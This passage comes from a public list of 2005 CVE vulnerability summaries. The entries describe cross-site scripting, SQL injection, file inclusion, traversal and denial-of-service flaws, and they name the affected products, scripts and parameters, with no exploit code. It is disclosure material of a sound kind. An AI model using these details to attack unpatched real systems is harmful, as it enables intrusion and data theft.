allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2005-3970] Cross-site scripting (XSS) vulnerability in MXChange before 0.2.0-pre10 PL492 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-3967] Cross-site scripting (XSS) vulnerability in the dosearchsite.action module in Atlassian Confluence 2.0.1 Build 321 allows remote attackers to inject arbitrary web script or HTML via the searchQuery.queryString search module parameter. [CVE-2005-3966] Cross-site scripting (XSS) vulnerability in search.jsp in Java Search Engine (JSE) 0.9.34 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-3961] export_handler.php in WebCalendar 1.0.1 allows remote attackers to overwrite WebCalendar data files via a modified id parameter. [CVE-2005-3959] Multiple cross-site scripting (XSS) vulnerabilities in FreeWebStat 1.0 rev37 allow remote attackers to inject arbitrary web script or HTML via the (1) site, (2) jsref, (3) jsres, and (4) jscolor parameters to pixel.php, which are not sanitized before being included in the logdb.html file, and (5) the search key to stat.php. [CVE-2005-3955] Multiple cross-site scripting (XSS) vulnerabilities in MagpieRSS 7.1, as used in (a) blogBuddiesv 0.3, (b) Jaws 0.6.2, and possibly other products, allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) magpie_debug.php and (2) rss_url parameter to (b) magpie_slashbox.php and (c) simple_smarty.php. [CVE-2005-3954] Cross-site scripting (XSS) vulnerability in blogBuddies 0.3 allows remote attackers to inject arbitrary web script or HTML via the u parameter to index.php. [CVE-2005-3949] Multiple SQL injection vulnerabilities in WebCalendar 1.0.1 allow remote attackers to execute arbitrary SQL commands via the (1) startid parameter to activity_log.php, (2) startid parameter to admin_handler.php, (3) template parameter to edit_template.php, and (4) multiple parameters to export_handler.php. [CVE-2005-3919] Cross-site scripting (XSS) vulnerability in PBLang 4.65 allows remote attackers to inject arbitrary web script or HTML via multiple fields in (1) UCP.php and (2) SendPm.php. [CVE-2005-3915] The Internet Key Exchange version 1 (IKEv1) implementation in Clavister Client Web allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. [CVE-2005-3912] Format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled, allows remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. NOTE: the code execution might be associated with an issue in Perl. [CVE-2005-3908] Cross-site scripting (XSS) vulnerability in search.php in GhostScripter Amazon Shop 5.0.0, and other versions before 5.0.2, allows remote attackers to inject web script or HTML via the query parameter. [CVE-2005-3902] Cross-site scripting (XSS) vulnerability in gui/errordocs/index.php in Virtual Hosting Control System (VHCS) 2.2.0 through 2.4.6.2 allows remote attackers to inject arbitrary web script or HTML via query strings that are included in an error message, as demonstrated using a parameter containing script. [CVE-2005-3895] Open Ticket Request System (OTRS) 1.0.0 through 1.3.2 and 2.0.0 through 2.0.3, when AttachmentDownloadType is set to inline, renders text/html e-mail attachments as HTML in the browser when the queue moderator attempts to download the attachment, which allows remote attackers to execute arbitrary web script or HTML. NOTE: this particular issue is referred to as XSS by some sources. [CVE-2005-3894] Multiple cross-site scripting (XSS) vulnerabilities in index.pl in Open Ticket Request System (OTRS) 1.0.0 through 1.3.2 and 2.0.0 through 2.0.3 allow remote authenticated users to inject arbitrary web script or HTML via (1) hex-encoded values in the QueueID parameter and (2) Action parameters. [CVE-2005-3892] Gadu-Gadu 7.20 allows remote attackers to eavesdrop on a user via a web page that accesses the EasycallLite.oce ActiveX control, which can initiate an outgoing phone call and listen to the microphone. [CVE-2005-3869] Cross-site scripting (XSS) vulnerability in index.php in Google API Search 1.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the REQ parameter. [CVE-2005-3867] Cross-site scripting (XSS) vulnerability in RevenuePilot Search Engine Script 1.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the REQ parameter, which is used when performing a search. [CVE-2005-3866] Cross-site scripting (XSS) vulnerability in SearchFeed Search Engine 1.3.2 and earlier allows remote attackers to inject arbitrary HTML and web script, possibly via the REQ parameter, which is used when performing a search. [CVE-2005-3865] SQL injection vulnerability in index.php in AllWeb search 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the search parameter. [CVE-2005-3860] PHP remote file inclusion vulnerability in athena.php in Oliver May Athena PHP Website Administration 0.1a allows remote attackers to execute arbitrary PHP code via a URL in the athena_dir parameter. [CVE-2005-3854] Cross-site scripting (XSS) vulnerability in index.php in EasyPageCMS allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2005-3851] Cross-site scripting (XSS) vulnerability in search.asp in Online Attendance System (OASYS) Lite 1.0 allows remote attackers to inject arbitrary web script or HTML via certain search parameters, possibly the keyword parameter. [CVE-2005-3850] Cross-site scripting (XSS) vulnerability in search.asp in Online Knowledge Base System (OKBSYS) Lite Edition 1.0 allows remote attackers to inject arbitrary web script or HTML via hex-encoded values in the q parameter. [CVE-2005-3849] Cross-site scripting (XSS) vulnerability in the Search module in PmWiki up to 2.0.12 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-3841] Cross-site scripting (XSS) vulnerability in kPlaylist 1.6 (build 400), and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchfor search parameter. [CVE-2005-3839] Cross-site scripting (XSS) vulnerability in SupportPRO Supportdesk allows remote attackers to inject arbitrary web script or HTML via the (1) post tickers and (2) view tickets options. [CVE-2005-3837] Cross-site scripting (XSS) vulnerability in the search module in sCssBoard 1.2 and 1.12, and earlier versions, allows remote attackers to inject arbitrary web script or HTML via the search_term parameter. [CVE-2005-3834] Cross-site scripting (XSS) vulnerability in search.php in Tunez 1.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchFor parameter. [CVE-2005-3821] Cross-site scripting (XSS) vulnerability in vTiger CRM 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via multiple vectors, including the account name. [CVE-2005-3818] Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) various input fields, including the contact, lead, and first or last name fields, (2) the record parameter in a DetailView action in the Leads module for index.php, (3) the $_SERVER['PHP_SELF'] variable, which is used in multiple locations such as index.php, and (4) aggregated RSS feeds in the RSS aggregation module. [CVE-2005-3817] Multiple SQL injection vulnerabilities in Softbiz Web Host Directory Script 1.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cid parameter in search_result.php, (2) sbres_id parameter in review.php, (3) cid parameter in browsecats.php, (4) h_id parameter in email.php, and (5) an unspecified parameter to the search module. [CVE-2005-3814] Multiple cross-site scripting (XSS) vulnerabilities in SmartPPC Pro allow remote attackers to inject arbitrary web script or HTML via the username parameter in (1) directory.php, (2) frames.php, and (3) search.php. [CVE-2005-3795] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft Affiliate Network Pro 7.2 allow remote attackers to inject arbitrary web script or HTML via (1) the Err parameter in admin/index.php and the (2) firstname and (3) lastname parameters in index.php. [CVE-2005-3790] Multiple cross-site scripting (XSS) vulnerabilities in act_newsletter.php in phpwcms 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the (1) i and (2) text parameters. [CVE-2005-3788] Race condition in Cisco Adaptive Security Appliance (ASA) 7.0(0), 7.0(2), and 7.0(4), when running with an Active/Standby configuration and when the failover LAN interface fails, allows remote attackers to cause a denial of service (standby firewall failure) by sending spoofed ARP responses from an IP address of an active firewall, which prevents the standby firewall from becoming active, aka "failover denial of service." [CVE-2005-3787] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4-pl4 allow remote attackers to inject arbitrary web script or HTML via (1) the cookie-based login panel, (2) the title parameter and (3) the table creation dialog. [CVE-2005-3776] Multiple cross-site scripting (XSS) vulnerabilities in MyBulletinBoard (MyBB) 1.0 PR2 Rev 686 allow remote attackers to inject arbitrary web script or HTML via (1) the subject field when creating a new thread and (2) information passed to the Reputation system. [CVE-2005-3771] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.4 allow remote attackers to inject arbitrary web script or HTML via (1) "GET and other variables" and (2) "SEF". [CVE-2005-3770] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Post (PHPp) 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the subject in a post, or the user parameter to (2) profile.php and (3) mail.php. [CVE-2005-3766] Exponent CMS 0.96.3 and later versions stores sensitive user pages under the web document root with insufficient access control even though certain permissions are specified, which allows attackers to access the pages by browsing uploaded files. [CVE-2005-3761] Cross-site scripting (XSS) vulnerability in Exponent CMS 0.96.3 and later versions allows remote attackers to inject arbitrary web script or HTML via (1) Javascript in forms produced by the form generator or (2) the parameters to the installer. [CVE-2005-3760] Double free vulnerability in the BBOORB module in IBM WebSphere Application Server for z/OS 5.0 allows attackers to cause a denial of service (ABEND). [CVE-2005-3759] Multiple cross-site scripting (XSS) vulnerabilities in Horde before 3.0.7 allow remote attackers to inject arbitrary web script or HTML via the (1) gzip/tar and (2) css MIME viewers, which do not filter or escape dangerous HTML when extracting and displaying attachments. [CVE-2005-3758] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to inject arbitrary Javascript, and possibly other web script or HTML, via a proxystylesheet variable that contains a malicious XSLT style sheet. [CVE-2005-3754] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to inject arbitrary Javascript, and possibly other web script or HTML, via the proxystylesheet variable, which will be executed in the resulting error message. [CVE-2005-3751] HTTP request smuggling vulnerability in Pound before 1.9.4 allows remote attackers to poison web caches, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with conflicting Content-length and Transfer-encoding headers. [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message. [CVE-2005-3742] Cross-site scripting (XSS) vulnerability in popup.php in Advanced Poll 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the poll_ident parameter. [CVE-2005-3736] Multiple cross-site scripting (XSS) vulnerabilities in e-Quick Cart allow remote attackers to inject arbitrary web script or HTML via the (1) strgifttoname parameter in shopgift.asp, (2) strfirstname parameter in shopmaillist.asp, (3) strpid parameter in shopprojectlogin.asp, and (4) Custname parameter in shoptellafriend.asp. [CVE-2005-3734] Cross-site scripting (XSS) vulnerability in the "add content" page in phpMyFAQ 1.5.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) thema, (2) username, and (3) usermail parameters. [CVE-2005-3730] Multiple cross-site scripting (XSS) vulnerabilities in HTTPTranslatorServlet in Idetix Software Systems Revize CMS allow remote attackers to inject arbitrary web script or HTML via the (1) resourcetype, (2) objectmap, and (3) redirect parameters, possibly involving setWebSpace.jsp. [CVE-2005-3728] Idetix Software Systems Revize CMS stores conf/revize.xml under the web document root with insufficient access control, which allows remote attackers to obtain sensitive configuration information. [CVE-2005-3714] The network interface for Apple AirPort Express 6.x before Firmware Update 6.3, and AirPort Extreme 5.x before Firmware Update 5.7, allows remote attackers to cause a denial of service (unresponsive interface) via malformed packets. [CVE-2005-3705] Heap-based buffer overflow in WebKit in Mac OS X and OS X Server 10.3.9 and 10.4.3, as used in applications such as Safari, allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2005-3699] Opera Web Browser 8.50 and 8.0 through 8.0.2 allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site. [CVE-2005-3697] Unspecified vulnerability in the administration interface in Uresk Links 2.0 Lite allows remote attackers to bypass authentication via unspecified vectors in index.php. [CVE-2005-3695] Cross-site scripting (XSS) vulnerability in admin/config/confMgr.php in LiteSpeed Web Server 2.1.5 allows remote attackers to inject arbitrary web script or HTML via the m parameter. [CVE-2005-3693] The AxWebRemoveCtrl ActiveX control for uninstalling the SunnComm MediaMax DRM allows remote attackers to download and execute arbitrary code, a similar vulnerability to CVE-2005-3650. [CVE-2005-3692] Cross-site scripting (XSS) vulnerability in AMAX Magic Winmail Server 4.2 (build 0824) and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) retid parameter in badlogin.php, (2) Content-Type headers in HTML mails, and (3) HTML mail attachments. [CVE-2005-3688] Cross-site scripting (XSS) vulnerability in members.php in XMB 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the "Your Current Mood" field in the registration page. [CVE-2005-3685] Cross-site scripting (XSS) vulnerability in shopadmin.asp in VP-ASP Shopping Cart 5.50 allows remote attackers to inject arbitrary web script or HTML via the UserName parameter. [CVE-2005-3676] SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter. [CVE-2005-3665] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.7.0 allow remote attackers to inject arbitrary web script or HTML via the (1) HTTP_HOST variable and (2) various scripts in the libraries directory that handle header generation. [CVE-2005-3638] Cross-site scripting (XSS) vulnerabilities in Ekinboard 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in profile.php and (2) titles of posts. [CVE-2005-3636] Cross-site scripting (XSS) vulnerability in SAP Web Application Server (WAS) 6.10 allows remote attackers to inject arbitrary web script or HTML via Error Pages. [CVE-2005-3635] Multiple cross-site scripting (XSS) vulnerabilities in SAP Web Application Server (WAS) 6.10 through 7.00 allow remote attackers to inject arbitrary web script or HTML via (1) the sap-syscmd in sap-syscmd and (2) the BspApplication field in the SYSTEM PUBLIC test application. [CVE-2005-3634] frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. [CVE-2005-3633] HTTP response splitting vulnerability in frameset.htm in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to inject arbitrary HTML headers via the sap-exiturl parameter. [CVE-2005-3618] Cross-site request forgery (CSRF) vulnerability in the management interface for VMware ESX Server 2.0.x before 2.0.2 patch 1, 2.1.x before 2.1.3 patch 1, and 2.x before 2.5.3 patch 2 allows allows remote attackers to perform unauthorized actions as the administrator via URLs, as demonstrated using the setUsr operation to change a password. NOTE: this issue can be leveraged with CVE-2005-3619 to automatically perform the attacks. [CVE-2005-3585] SQL injection vulnerability in forum.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the forum parameter. [CVE-2005-3584] Cross-site scripting (XSS) vulnerability in forum.php in PhpWebThings 1.4.4 allows remote attackers to inject arbitrary web script or HTML via the forum parameter. [CVE-2005-3577] Cross-site scripting vulnerability (XSS) in ts.exe (aka ts.cgi) in Walla TeleSite 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the sug parameter. [CVE-2005-3570] Unspecified cross-site scripting (XSS) vulnerability in Horde before 2.2.9 allows remote attackers to inject arbitrary web script or HTML via "not properly escaped error messages". [CVE-2005-3556] Multiple cross-site scripting (XSS) vulnerabilities in PHPlist 2.10.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) listname parameter in (a) admin/editlist.php, (2) title parameter in (b) admin/spageedit.php, (3) title field in (c) admin/template.php, (4) filter, (5) delete, and (6) start parameters in (d) admin/eventlog.php, (7) id parameter in (e) admin/configure.php, (8) find parameter in (f) admin/users.php, (9) start parameter in (g) admin/admin.php, and (10) action parameter in (h) admin/fckphplist.php. [CVE-2005-3552] Multiple cross-site scripting (XSS) vulnerabilities in PHPKIT 1.6.1 R2 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple vectors in (1) login/profile.php, (2) login/userinfo.php, (3) admin/admin.php, (4) imcenter.php, and the (5) referer statistics, the (6) HTML title element and (7) logo alt attributes in forum postings, and the (8) Homepage field in the Guestbook. [CVE-2005-3551] toendaCMS before 0.6.2 stores user account and session data in the web root directory, which allows remote attackers to obtain sensitive information via a direct request to the appropriate XML file. [CVE-2005-3547] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) adsess, (2) name, and (3) description parameters in admin.php, and the (4) ACP Notes, (5) Member Name, (6) Password, (7) Email Address, (8) Components, and multiple other input fields. [CVE-2005-3544] Cross-site scripting (XSS) vulnerability in u2u.php in XMB 1.9.3 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2005-3530] Cross-site scripting (XSS) vulnerability in Antville 1.1 allows remote attackers to inject arbitrary web script or HTML via the notfound.skin error document. [CVE-2005-3528] Cross-site scripting (XSS) vulnerability in tiki-view_forum_thread.php in TikiWiki 1.9.0 through 1.9.2 allows remote attackers to inject arbitrary web script or HTML via the topics_offset parameter. [CVE-2005-3522] Cross-site scripting (XSS) vulnerability in index.jsp in ManageEngine Netflow Analyzer 4.0.2 allows remote attackers to inject arbitrary web script or HTML via the grDisp parameter. [CVE-2005-3520] Multiple cross-site scripting (XSS) vulnerabilities in MySource 2.14.0 allow remote attackers to inject arbitrary web script or HTML via (1) the target_url parameter in upgrade_in_progress_backend.php, (2) the stylesheet parameter in edit_table_cell_type_wysiwyg.php, and the bgcolor parameter in (3) insert_table.php, (4) edit_table_cell_props.php, (5) header.php, (6) edit_table_row_props.php, and (7) edit_table_props.php. [CVE-2005-3516] Cross-site scripting (XSS) vulnerability in recommend.php in Chipmunk Directory script allows remote attackers to inject arbitrary web script or HTML via the entryID parameter. [CVE-2005-3515] Cross-site scripting (XSS) vulnerability in recommend.php in Chipmunk Topsites script allows remote attackers to inject arbitrary web script or HTML via the ID parameter. [CVE-2005-3514] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Forum script allow remote attackers to inject arbitrary web script or HTML via the forumID parameter to (1) newtopic.php, (2) quote.php, (3) index.php, and (4) reply.php. [CVE-2005-3512] Cross-site scripting (XSS) vulnerability in index.php in VUBB alpha rc1 allows remote attackers to inject arbitrary web script or HTML via the t parameter in a newreply action. [CVE-2005-3511] Multiple cross-site scripting (XSS) vulnerabilities in Spymac Web OS 4.0 allow remote attackers to inject arbitrary web script or HTML via (a) the blogs module, including the (1) curr parameter in index.php, (2) inspire, (3) system, or (4) title parameter in blog_newentry.php, (5) entry parameter in blog_newentry_comment.php, (6) entry parameter in blog_edit_entry.php, or (7) caldate parameter in blog.php [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files. [CVE-2005-3506] Cross-site scripting (XSS) vulnerability in proxy.asp in Sambar Server 6.3 BETA 2 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via the (1) Remote Proxy Server or (2) Proxy Filter IPs field. [CVE-2005-3505] Cross-site scripting (XSS) vulnerability in the Entropy Chat script in cPanel 10.2.0-R82 and 10.6.0-R137 allows remote attackers to inject arbitrary web script or HTML via a chat message containing Javascript in style attributes in tags such as <b>, which are processed by Internet Explorer. [CVE-2005-3498] IBM WebSphere Application Server 5.0.x before 5.02.15, 5.1.x before 5.1.1.8, and 6.x before fixpack V6.0.2.5, when session trace is enabled, records a full URL including the queryString in the trace logs when an application encodes a URL, which could allow attackers to obtain sensitive information. [CVE-2005-3496] Cross-site scripting (XSS) vulnerability in PHP Handicapper allows remote attackers to inject arbitrary web script or HTML via the msg parameter to msg.php. NOTE: some sources identify a second vector in the login parameter to process_signup.php, but the original source says that it is for CRLF injection (CVE-2005-4712). Also note: the vendor has disputed CVE-2005-3497, and it is possible that the dispute was intended to include this issue as well. If so, followup investigation strongly suggests that the original report is correct. [CVE-2005-3494] Cross-site scripting (XSS) vulnerability in Ar-blog 5.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a blog comment. [CVE-2005-3490] Directory traversal vulnerability in the web server in Asus Video Security 3.5.0.0 and earlier allows remote attackers to read arbitrary files via "../" or "..\" sequences in the URL. [CVE-2005-3479] Cross-site scripting (XSS) vulnerability in login.asp in Ringtail CaseBook 6.1.0 allows remote attackers to inject arbitrary web script or HTML via the users parameter. [CVE-2005-3475] Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via HTTP crafted GET requests. [CVE-2005-3473] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog 0.4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entry, (2) blog_subject, and (3) blog_text parameters (involving the temp_subject variable) in (a) preview_cgi.php and (b) preview_static_cgi.php, or (4) scheme_name parameter and (5) bg_color parameters (involving the preset_name and result variables) in (c) colors.php. [CVE-2005-3468] Directory traversal vulnerability in F-Secure Anti-Virus for Microsoft Exchange 6.40 and Internet Gatekeeper 6.40 to 6.42 allows limited remote attackers to bypass Web Console authentication and read files. [CVE-2005-3453] Multiple unspecified vulnerabilities in Web Cache in Oracle Application Server 1.0 up to 10.1.2.0 has unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS12 and (2) AS14. [CVE-2005-3452] Unspecified vulnerability in Web Cache in Oracle Application Server 1.0 up to 9.0.4.2 has unknown impact and attack vectors, as identified by Oracle Vuln# AS13. [CVE-2005-3449] Multiple unspecified vulnerabilities in Oracle Application Server 9.0 up to 10.1.2.0 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS02 in Containers for J2EE, (2) AS07 in Internet Directory, (3) AS09 in Report Server, and (4) AS11 in Web Cache. [CVE-2005-3444] Multiple unspecified vulnerabilities in the Programmatic Interface in Oracle Database Server from 8i up to 9.2.0.5 have unknown impact and attack vectors, aka Oracle Vuln# DB26. [CVE-2005-3436] Cross-site scripting (XSS) vulnerability in Nuked-Klan 1.7 allows remote attackers to inject arbitrary web script or HTML via the (1) Search module, (2) certain edit fields in Guestbook, (3) the title in the Forum module, and (4) Textbox. [CVE-2005-3434] Archilles Newsworld before 1.5.0-rc1 stores (1) account.nwd and (2) session.nwd under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames, hashed passwords, and session IDs, and gain privileges. [CVE-2005-3428] Cross-site scripting (XSS) vulnerability in Rockliffe MailSite Express before 6.1.22 allows remote attackers to inject arbitrary web script or HTML via a message body. [CVE-2005-3425] Cross-site scripting (XSS) vulnerability in GNUMP3D before 2.9.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2005-3424. [CVE-2005-3424] Cross-site scripting (XSS) vulnerability in GNUMP3D before 2.9.5 allows remote attackers to inject arbitrary web script or HTML via 404 error pages, a different vulnerability than CVE-2005-3425. [CVE-2005-3422] Cross-site scripting (XSS) vulnerability in error.asp in ASP Fast Forum allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2005-3418] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) error_msg parameter to usercp_register.php, (2) forward_page parameter to login.php, and (3) list_cat parameter to search.php, which are not initialized as variables. [CVE-2005-3414] eyeOS 0.8.4 stores usrinfo.xml under the web document root with insufficient access control, which allows remote attackers to obtain user credentials. [CVE-2005-3413] Cross-site scripting (XSS) vulnerability in desktop.php in eyeOS 0.8.4 allows remote attackers to inject arbitrary web script or HTML via the motd parameter. [CVE-2005-3412] Cross-site scripting (XSS) vulnerability in Elite Forum 1.0.0.0 allows remote attackers to inject arbitrary web script or HTML via a Post Reply to a topic, in which the reply contains a javascript: URL in an <img> tag. [CVE-2005-3411] Cross-site scripting (XSS) vulnerability in post.asp in Snitz Forums 2000 3.4.05 allows remote attackers to inject arbitrary web script or HTML via the type parameter in a Topic method. [CVE-2005-3406] Cross-site scripting (XSS) vulnerability in phpESP 1.7.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-3403] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.4.1 through 1.5.1-pl1 allow remote attackers to inject arbitrary web script or HTML via (1) the _base_href parameter in translate.php, (2) the _base_path parameter in news.inc.php, and (3) the p parameter in add_note.php. [CVE-2005-3398] The default configuration of the web server for the Solaris Management Console (SMC) in Solaris 8, 9, and 10 enables the HTTP TRACE method, which could allow remote attackers to obtain sensitive information such as cookies and authentication data from HTTP headers. [CVE-2005-3397] Cross-site scripting (XSS) vulnerability in Comersus BackOffice allows remote attackers to inject arbitrary web script or HTML via the error parameter to comersus_backoffice_supportError.asp. NOTE: the comersus_backoffice_message.asp/message vector is already covered by CVE-2005-2191 item 2. [CVE-2005-3388] Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a "stacked array assignment." [CVE-2005-3386] SQL injection vulnerability in Techno Dreams Web Directory script allows remote attackers to execute arbitrary SQL commands and bypass authentication via the userid parameter in admin/login.asp. [CVE-2005-3373] Multiple interpretation error in Dr.Web 4.32b allows remote attackers to bypass virus scanning via a file such as BAT, HTML, and EML with an "MZ" magic byte sequence which is normally associated with EXE, which causes the file to be treated as a safe type that could still be executed as a dangerous file type by applications on the end system, as demonstrated by a "triple headed" program that contains EXE, EML, and HTML content, aka the "magic byte bug." [CVE-2005-3368] Cross-site scripting (XSS) vulnerability in the Search_Enhanced module in PHP-Nuke 7.9 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2005-3367] Cross-site scripting (XSS) vulnerability in journal.php in SparkleBlog 2.1 allows remote attackers to inject arbitrary web script or HTML via the name field. [CVE-2005-3361] Cross-site scripting (XSS) vulnerability in forum/index.php in FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the nome parameter in a login operation, a variant of CVE-2005-3306. [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps. [CVE-2005-3348] HTTP response splitting vulnerability in index.php in phpSysInfo 2.4 and earlier, as used in phpgroupware 0.9.16 and earlier, and egroupware before 1.0.0.009, allows remote attackers to spoof web content and poison web caches via CRLF sequences in the charset parameter. [CVE-2005-3342] noweb 2.10c and earlier allows local users to overwrite arbitrary files via symlink attacks on temporary files in (1) lib/toascii.nw and (2) shell/roff.mm. [CVE-2005-3337] Multiple cross-site scripting (XSS) vulnerabilities in Mantis before 0.19.3 allow remote attackers to inject arbitrary web script or HTML via (1) unknown vectors involving Javascript and (2) mantis/view_all_set.php. [CVE-2005-3334] Cross-site scripting (XSS) vulnerability in index.php in Flyspray 0.9.7 through 0.9.8 (devel) allows remote attackers to inject arbitrary web script or HTML via the (1) PHPSESSID, (2) task, (3) string, (4) type, (5) serv, (6) due, (7) dev, and (8) sort2 parameters. [CVE-2005-3333] SQL injection vulnerability in eBASEweb 3.0 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors. [CVE-2005-3330] The _httpsrequest function in Snoopy 1.2, as used in products such as (1) MagpieRSS, (2) WordPress, (3) Ampache, and (4) Jinzora, allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTPS URL to an SSL protected web page, which is not properly handled by the fetch function. [CVE-2005-3329] Cross-site scripting (XSS) vulnerability in RSA Authentication Agent for Web 5.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the image parameter in a GetPic operation. [CVE-2005-3320] Cross-site scripting (XSS) vulnerability in SiteTurn Domain Manager Pro allows remote attackers to inject arbitrary web script or HTML via the err parameter in the panel script. [CVE-2005-3316] The installation of ON Symantec Discovery 4.5.x and Symantec Discovery 6.0 creates the (1) DiscoveryWeb and (2) DiscoveryRO database accounts with null passwords, which could allow attackers to gain privileges or prevent Discovery from running by setting another password. [CVE-2005-3312] The HTML rendering engine in Microsoft Internet Explorer 6.0 allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML in corrupted images and other files such as .GIF, JPG, and WAV, which is rendered as HTML when the user clicks on the link, even though the web server response and file extension indicate that it should be treated as a different file type. [CVE-2005-3310] Interpretation conflict in phpBB 2.0.17, with remote avatars and avatar uploading enabled, allows remote authenticated users to inject arbitrary web script or HTML via an HTML file with a GIF or JPEG file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer, which renders malformed image types as HTML, enabling cross-site scripting (XSS) attacks. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer (CVE-2005-3312) and the proper fix should be in that browser [CVE-2005-3308] Multiple cross-site scripting (XSS) vulnerabilities in Zomplog 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) comment parameter in detail.php, (3) the username parameter in get.php, and (4) the search parameter in index.php. [CVE-2005-3306] Cross-site scripting (XSS) vulnerability in index.php for FlatNuke 2.5.6 allows remote attackers to inject arbitrary web script or HTML via the user parameter in a profile operation, a different vulnerability than CVE-2005-2814. NOTE: it is possible that this XSS is a resultant vulnerability of CVE-2005-3307. [CVE-2005-3304] Multiple SQL injection vulnerabilities in PHP-Nuke 7.8 allow remote attackers to modify SQL queries and execute arbitrary PHP code via (1) the username parameter in the Your Account page, (2) the url parameter in the Downloads module, and (3) the description parameter in the Web_Links module. [CVE-2005-3301] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.6.4-pl3 allow remote attackers to inject arbitrary web script or HTML via certain arguments to (1) left.php, (2) queryframe.php, or (3) server_databases.php. [CVE-2005-3292] Multiple cross-site scripting (XSS) vulnerabilities in Xeobook 0.93 allow remote attackers to inject arbitrary web script or HTML via Javascript events in tages such as <b>. [CVE-2005-3285] Cross-site scripting (XSS) vulnerability in comersus_backoffice_searchItemForm.asp in Comersus BackOffice Plus allows remote attackers to inject arbitrary web script or HTML via the (1) forwardTo1, (2) forwardTo2, (3) nameFT1, or (4) nameFT2 